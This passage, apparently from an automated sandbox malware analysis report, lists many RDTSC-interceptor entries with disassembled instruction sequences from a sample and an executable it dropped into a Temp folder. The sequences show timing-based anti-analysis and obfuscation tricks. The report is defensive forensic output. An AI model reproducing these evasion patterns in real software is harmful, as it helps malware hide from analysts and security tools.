edx 0x00000070 jmp 00007F36B8D8D097h 0x00000075 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90630 second address: 4A90635 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90635 second address: 4A9065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F36B8D8D098h 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A9065B second address: 4A9065F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A9065F second address: 4A90665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90665 second address: 4A9066B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A9066B second address: 4A906DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c mov ch, ACh 0x0000000e pushfd 0x0000000f jmp 00007F36B8D8D097h 0x00000014 adc ax, 721Eh 0x00000019 jmp 00007F36B8D8D099h 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebx 0x00000021 jmp 00007F36B8D8D08Eh 0x00000026 push eax 0x00000027 pushad 0x00000028 mov ebx, 29968DC4h 0x0000002d mov esi, ebx 0x0000002f popad 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F36B8D8D092h 0x00000038 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90706 second address: 4A90742 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 pushfd 0x00000006 jmp 00007F36B8869C03h 0x0000000b jmp 00007F36B8869C03h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov esi, eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov dx, FF26h 0x0000001d push ebx 0x0000001e pop ecx 0x0000001f popad 0x00000020 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90742 second address: 4A9078E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 9F75h 0x00000007 jmp 00007F36B8D8D092h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test esi, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F36B8D8D08Dh 0x0000001a sbb ecx, 6AA89F36h 0x00000020 jmp 00007F36B8D8D091h 0x00000025 popfd 0x00000026 mov si, 5327h 0x0000002a popad 0x0000002b rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A9078E second address: 4A9008B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F372A737AACh 0x0000000f xor eax, eax 0x00000011 jmp 00007F36B884332Ah 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e sub esp, 04h 0x00000021 mov edi, eax 0x00000023 xor ebx, ebx 0x00000025 cmp edi, 00000000h 0x00000028 je 00007F36B8869E07h 0x0000002e call 00007F36BC536C28h 0x00000033 mov edi, edi 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F36B8869C00h 0x0000003c or si, 0C68h 0x00000041 jmp 00007F36B8869BFBh 0x00000046 popfd 0x00000047 mov bx, cx 0x0000004a popad 0x0000004b xchg eax, ebp 0x0000004c jmp 00007F36B8869C02h 0x00000051 push eax 0x00000052 jmp 00007F36B8869BFBh 0x00000057 xchg eax, ebp 0x00000058 jmp 00007F36B8869C06h 0x0000005d mov ebp, esp 0x0000005f jmp 00007F36B8869C00h 0x00000064 xchg eax, ecx 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F36B8869C07h 0x0000006c rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A9008B second address: 4A900A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8D8D094h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A900A3 second address: 4A900A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A900A7 second address: 4A900B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ax, di 0x0000000f push ebx 0x00000010 pop ecx 0x00000011 popad 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A900B9 second address: 4A900FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F36B8869C00h 0x0000000f mov dword ptr [ebp-04h], 55534552h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F36B8869C07h 0x0000001d rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90C6E second address: 4A90C93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F36B8D8D090h 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90C93 second address: 4A90CA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90D8C second address: 4A90DFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov bx, B626h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push 361B343Ch 0x00000012 jmp 00007F36B8D8D08Ah 0x00000017 xor dword ptr [esp], 4081A814h 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F36B8D8D08Eh 0x00000025 jmp 00007F36B8D8D095h 0x0000002a popfd 0x0000002b push eax 0x0000002c jmp 00007F36B8D8D097h 0x00000031 pop ecx 0x00000032 popad 0x00000033 call 00007F372AC51E09h 0x00000038 push 76952B70h 0x0000003d push dword ptr fs:[00000000h] 0x00000044 mov eax, dword ptr [esp+10h] 0x00000048 mov dword ptr [esp+10h], ebp 0x0000004c lea ebp, dword ptr [esp+10h] 0x00000050 sub esp, eax 0x00000052 push ebx 0x00000053 push esi 0x00000054 push edi 0x00000055 mov eax, dword ptr [769B4538h] 0x0000005a xor dword ptr [ebp-04h], eax 0x0000005d xor eax, ebp 0x0000005f push eax 0x00000060 mov dword ptr [ebp-18h], esp 0x00000063 push dword ptr [ebp-08h] 0x00000066 mov eax, dword ptr [ebp-04h] 0x00000069 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000070 mov dword ptr [ebp-08h], eax 0x00000073 lea eax, dword ptr [ebp-10h] 0x00000076 mov dword ptr fs:[00000000h], eax 0x0000007c ret 0x0000007d push eax 0x0000007e push edx 0x0000007f push eax 0x00000080 push edx 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90DFA second address: 4A90DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90DFE second address: 4A90E0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0B32 second address: 4AA0B38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0B38 second address: 4AA0B51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0B51 second address: 4AA0B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edi 0x00000006 popad 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0B58 second address: 4AA0B8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F36B8D8D092h 0x00000009 sub eax, 704FA278h 0x0000000f jmp 00007F36B8D8D08Bh 0x00000014 popfd 0x00000015 mov edi, esi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0B8C second address: 4AA0B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0B90 second address: 4AA0BA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D093h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0BA7 second address: 4AA0BBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8869C04h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0BBF second address: 4AA0BF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F36B8D8D08Fh 0x00000012 popad 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F36B8D8D091h 0x0000001b rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0BF6 second address: 4AA0C3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F36B8869BFEh 0x00000011 test esi, esi 0x00000013 jmp 00007F36B8869C00h 0x00000018 je 00007F372A71737Fh 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 movsx edi, si 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0C3D second address: 4AA0C66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a cmp dword ptr [769B459Ch], 05h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F36B8D8D096h 0x00000018 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0C66 second address: 4AA0C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0C6C second address: 4AA0CBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F372AC528A9h 0x0000000e pushad 0x0000000f mov di, B88Ah 0x00000013 pushfd 0x00000014 jmp 00007F36B8D8D08Bh 0x00000019 or ax, F72Eh 0x0000001e jmp 00007F36B8D8D099h 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F36B8D8D08Dh 0x0000002d rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0CBB second address: 4AA0D0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx ebx, ax 0x0000000e pushfd 0x0000000f jmp 00007F36B8869C08h 0x00000014 jmp 00007F36B8869C05h 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0D0C second address: 4AA0D12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0D47 second address: 4AA0D69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0DE5 second address: 4AA0DF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8D8D08Ch 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: DBEB10 second address: DBEB1D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F36B8869BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F42AD8 second address: F42AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F36B8D8D086h 0x0000000a popad 0x0000000b jc 00007F36B8D8D08Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F42C32 second address: F42C38 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F43067 second address: F4306B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F4306B second address: F4308F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F36B8869BFEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F4308F second address: F430B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 jmp 00007F36B8D8D097h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F430B0 second address: F430B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F430B6 second address: F430BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F430BC second address: F430C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F430C5 second address: F430CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F430CB second address: F430CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F430CF second address: F430E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F36B8D8D086h 0x0000000d jne 00007F36B8D8D086h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F43213 second address: F43233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F36B8869C03h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F43233 second address: F43239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F4563B second address: F45645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F36B8869BF6h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F45645 second address: F456BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F36B8D8D095h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F36B8D8D088h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 mov edx, dword ptr [ebp+122D358Dh] 0x0000002f push 00000000h 0x00000031 mov edx, dword ptr [ebp+122D1DF3h] 0x00000037 jmp 00007F36B8D8D096h 0x0000003c push 6D55BBB6h 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F36B8D8D08Dh 0x00000048 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F456BF second address: F45769 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007F36B8869BF6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 6D55BB36h 0x00000013 mov dword ptr [ebp+122D1E2Fh], esi 0x00000019 push 00000003h 0x0000001b mov ecx, dword ptr [ebp+122D396Fh] 0x00000021 push 00000000h 0x00000023 clc 0x00000024 push 00000003h 0x00000026 jmp 00007F36B8869C03h 0x0000002b jbe 00007F36B8869BFCh 0x00000031 mov dword ptr [ebp+122D27B5h], ebx 0x00000037 call 00007F36B8869BF9h 0x0000003c push esi 0x0000003d jg 00007F36B8869BF8h 0x00000043 pop esi 0x00000044 push eax 0x00000045 jp 00007F36B8869C0Ah 0x0000004b jmp 00007F36B8869C04h 0x00000050 mov eax, dword ptr [esp+04h] 0x00000054 jmp 00007F36B8869C04h 0x00000059 mov eax, dword ptr [eax] 0x0000005b jmp 00007F36B8869C03h 0x00000060 mov dword ptr [esp+04h], eax 0x00000064 pushad 0x00000065 pushad 0x00000066 pushad 0x00000067 popad 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F45769 second address: F457F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F36B8D8D090h 0x0000000a popad 0x0000000b pop eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F36B8D8D088h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 call 00007F36B8D8D090h 0x0000002b jmp 00007F36B8D8D08Fh 0x00000030 pop esi 0x00000031 lea ebx, dword ptr [ebp+1245A190h] 0x00000037 xor si, 68C0h 0x0000003c xchg eax, ebx 0x0000003d pushad 0x0000003e jmp 00007F36B8D8D08Fh 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F36B8D8D094h 0x0000004a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F457F7 second address: F45815 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F36B8869C04h 0x00000010 jmp 00007F36B8869BFEh 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F6346D second address: F63471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F63471 second address: F63494 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F63494 second address: F63498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F63498 second address: F634B3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F36B8869BF6h 0x00000008 jmp 00007F36B8869C01h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F634B3 second address: F634B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F639AF second address: F639B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F36B8869BF6h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F63DF4 second address: F63E0C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F36B8D8D08Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c js 00007F36B8D8D086h 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F63E0C second address: F63E12 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F63FA0 second address: F63FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F6423F second address: F64264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F36B8869BF6h 0x0000000a jng 00007F36B8869BF6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F36B8869C02h 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F64264 second address: F64268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F64268 second address: F6426E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F643DA second address: F6440D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F36B8D8D086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnp 00007F36B8D8D086h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007F36B8D8D090h 0x00000018 jbe 00007F36B8D8D086h 0x0000001e popad 0x0000001f push edx 0x00000020 jg 00007F36B8D8D086h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F6440D second address: F64431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F36B8869C03h 0x0000000a popad 0x0000000b jl 00007F36B8869C00h 0x00000011 push esi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
